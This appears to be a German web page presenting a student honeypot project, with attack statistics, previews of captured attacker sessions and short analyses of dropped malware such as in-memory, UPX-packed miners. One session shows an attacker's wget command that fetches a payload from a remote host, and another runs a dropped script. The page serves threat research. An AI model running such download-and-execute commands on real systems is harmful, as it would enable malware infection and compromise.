Skip to Content

What da Hacker doin'

Beobachte aus sicherer Entfernung echte Kompromittierungen zum Verstehen von Angreifern

root@honey: ~

Über das High-Interaction-Honeypot-Projekt

Das High-Interaction-Honeypot-Projekt bietet einen tiefgehenden Einblick in reale Cyberangriffe. Statt Angriffe nur von außen zu erkennen, analysiert das Projekt die tatsächlichen Befehle, Techniken und Vorgehensweisen der Angreifer im Detail.

Sämtliche Aktivitäten werden aufgezeichnet, ausgewertet und anschaulich visualisiert. Mithilfe von Asciinema-Aufzeichnungen und umfassenden Systemlogs wird das Verhalten der Angreifer dokumentiert und in Live-Sessions wiedergegeben.

So erhalten Interessierte einen transparenten Überblick über reale Angriffsszenarien und können Live-Hacking beobachten – sicher und ohne Risiko für die eigene Infrastruktur.

Das Projekt entstand im Rahmen eines Bachelor-Praxisprojekts und wurde mithilfe von Docker technisch umgesetzt. Die gesammelten Daten stehen auf Anfrage gerne für Forschungs- und Analysezwecke zur Verfügung.

Gemessen wurde vom 17.10.2025 bis zum 02.12.2025.

203.659

Login-Versuche insgesamt

3.868 erfolgreich

41

Aktive Sessions aufgezeichnet

Interaktive Handlungen beobachtet

Captured Sessions

Es wurden insgesamt 41 interaktive Sessions aufgenommen von denen hier 4 relevante dargestellt werden.

honeypot:~# preview

1. Skript-Kiddie außer Kontrolle

Ein Angreifer versucht, sich einen Überblick über das System zu verschaffen.

root@honey:~#apt install neofetch
... executing payload ...
... connection established ...
honeypot:~# preview

2. Download & Execute

Ausführen eines bösartigen Payloads von einem entfernten Server.

root@honey:~#./fakewhiteblack.sh.1
... executing payload ...
... connection established ...
honeypot:~# preview

3. Malware laden war noch nie so einfach

Ein Angreifer versucht, über wget Payload runterzuladen.

root@honey:~#wget http://uploader.sh/oFfa5/payload
... executing payload ...
... connection established ...
honeypot:~# preview

4. Exfiltration

Ein Angreifer liest vorhandene Ordner aus.

root@honey:~#ls
... executing payload ...
... connection established ...

Interesting Files

Es wurden einige Dateien im Honeypot erstellt sowie verändert - hier sind exemplarisch 3 dieser Dateien dargestellt.

.WUOYLTkEKvSRcZpMLsQ3adyarI

1.8 MB23.10.2025
Linux-ELF-Datei, führt Code direkt aus dem Speicher aus.

Technische Analyse: .WUOYLTkEKvSRcZpMLsQ3adyarI

Die Datei entpackt versteckten Code direkt im Arbeitsspeicher und führt ihn ohne Spuren auf der Festplatte aus, was typisch für Malware ist, die unentdeckt bleiben will.

Technische Analyse: .systemcache436621

Versteckte Cache- oder Steuerdatei, die von einem kompromittierten Prozess genutzt wird, um Konfigurationsdaten, Statusinformationen oder Befehle zwischenzuspeichern.

.systemcache436621

size unbekannt11.11.2025
Keine ausführbare Datei – vermutlich von einem Bot oder Miner zur Ablage von Anweisungen oder Laufzeitdaten genutzt.

.0ShLdnh6F

1.8 MB15.11.2025
Entpackt und startet Schadcode ausschließlich im RAM (fileless execution), häufig genutzt von Mining-Botnets.

Technische Analyse: .0ShLdnh6F

UPX-gepackte Linux-ELF-Datei, die sich beim Start selbst entpackt und ihren Payload direkt im Arbeitsspeicher ausführt. Nutzt speicherbasierte Ausführungstechniken zur Umgehung von Dateisystem- und Signaturerkennung und wird mit Cryptomining- und Trojaner-Aktivitäten in Verbindung gebracht.

Geografische Verteilung der Angreifer

Disclaimer: Assumed Locations affected through VPNs